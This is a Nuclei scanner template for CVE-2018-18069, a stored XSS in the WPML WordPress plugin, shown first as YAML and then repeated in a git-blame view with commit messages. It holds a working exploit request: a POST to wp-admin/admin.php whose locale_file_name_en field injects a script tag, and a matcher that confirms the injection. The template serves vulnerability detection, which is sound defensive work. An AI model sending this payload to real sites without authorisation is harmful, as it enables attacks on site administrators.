nuclei-templates/cves/2018/CVE-2018-18069.yaml

id: CVE-2018-18069

info:
  name: Wordpress unauthenticated stored xss
  author: nadino
  severity: medium
  description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
  tags: cve,cve2018,wordpress,xss
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-18069
    cwe-id: CWE-79
  reference:
    - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php"
    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-18069`
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00
			`info:`
			`name: Wordpress unauthenticated stored xss`
			`author: nadino`
improve wp cve admin 2020-05-23 08:09:09 +00:00			`severity: medium`
description bugs 2020-08-25 22:22:08 +00:00			`description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2018,wordpress,xss`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2018-18069`
			`cwe-id: CWE-79`
			`reference:`
			`- https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/`
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00
			`requests:`
			`- method: POST`
improve wp cve admin 2020-05-23 08:09:09 +00:00			`path:`
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00			`- "{{BaseURL}}/wp-admin/admin.php"`
Update CVE-2018-18069.yaml 2021-06-17 16:41:00 +00:00			`body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'`
Update CVE-2018-18069.yaml 2021-06-17 16:50:02 +00:00			`redirects: true`
improve wp cve admin 2020-05-23 08:09:09 +00:00
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2018-18069.yaml 2021-06-17 16:43:32 +00:00			`- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'`